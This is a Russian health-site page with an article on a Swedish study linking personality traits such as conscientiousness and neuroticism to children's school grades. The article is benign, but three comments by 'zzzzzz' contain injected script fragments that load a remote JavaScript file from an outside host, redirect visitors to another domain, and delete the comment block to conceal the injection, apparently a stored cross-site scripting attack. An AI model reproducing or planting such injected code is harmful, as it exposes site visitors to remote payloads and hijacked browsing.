Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Что обеспечит вашему ребе...  >>  Что обеспечит вашему ребенку хорошие оценки в школе? Страх или любовь?
 
Обратная связь
 

Что обеспечит вашему ребенку хорошие оценки в школе? Страх или любовь?

Размер шрифта
02 сентября 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ни для кого не секрет, что дети по-разному учатся в школе: кто-то на тройки, кто-то на пятерки. Отчего же это зависит? У шведских ученых нашелся неожиданный ответ на этот вопрос.

Что обеспечит вашему ребенку хорошие оценки в школе? Страх или любовь?

Что определяет успеваемость детей? Школа, домашняя обстановка, талант педагога, уровень интеллекта – это правильные ответы. Но предположим, что все вышеописанные характеристики у двух детей одинаковы: почему один ходит в троечниках, а у другого дневник сияет от пятерок? Есть ли какой-нибудь еще фактор, влияющий на успехе в учебе?

Эти вопросы взволновали ученых из Лундского университета (Швеция). Они отобрали 200 старшеклассников из южной Швеции и опросили их дважды с интервалом в три года. Предметом опроса стали личностные особенности: характер, темперамент и так далее.

Ученые пришли к выводу, что существует «большая пятерка» черт, которые очень стабильны и в значительной мере определяют наше поведение. К ним относятся открытость, добросовестность, экстраверсия (склонность к выражению эмоций), контактность и невротизм (черта личности, характеризующаяся эмоциональной неустойчивостью, тревогой, низким самоуважением).

Одна из этих черт – добросовестность – особенно способствует хорошей успеваемости. Невротизм также зачастую приводит к высоким результатам, потому что дети, движимые страхом и тревогой, учатся усерднее. Как ни парадоксально, но оказалось, что открытость, нередко проявляющаяся интеллектуальным любопытством, статистически не ассоциируется с отличной успеваемостью.

«Это проблема нашей образовательной системы: она не поощряет любопытство, в страх – ее главный инструмент», – утверждает Пиа Розандер, глава исследования. «Конечно, это крайне негативно сказывается на психологическом состоянии детей».

Ученые выявили любопытную половую закономерность. Оказалось, что у девочек добросовестность ассоциирована с высоким IQ, а мальчиков – наоборот! «Нередко бывает так, что молодые люди стараются компенсировать низкий уровень интеллекта усидчивостью и старательным подходом к делу».

Также исследователи отмечают, что успеваемость интровертов выше, чем у экстравертов. Доктор Розандер полагает, что это связано с тем, что экстраверты распыляют свою эмоциональную энергию, и им труднее сфокусироваться на учебе.

«Результаты нашего исследования убедительно показывают, что педагогика нуждается в реформации», – говорит в заключение Розандер. «Стандартная же система, вместо того чтобы искать индивидуальный подход, хоронит потенциальные таланты под грузом «двоек» и «троек».

Подводя итог, не ругайте своего ребенка за плохие оценки, а попытайтесь понять, почему он плохо учится и можно ли на это повлиять другими, неагрессивными методами.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Всемирная неделя первичного иммунодефицита начинается в Москве!   Беременность: как обезопасить себя и будущего малыша от вирусов   С какого возраста малышам можно давать иммуномодуляторы?   Страшные сны у ребенка – признак того, что его обижают в школе! Что делать?  
03 октября 2013Результаты благотворительного марафона «Всем миром» 17 июля 2013Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца!
 
10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 

Слайдшоу

1
Можно ли пережить беременность без рвоты?
Убийцы в вашей ванной
Можно ли подгадать с беременностью?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Что вы знаете о грудном вскармливании?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.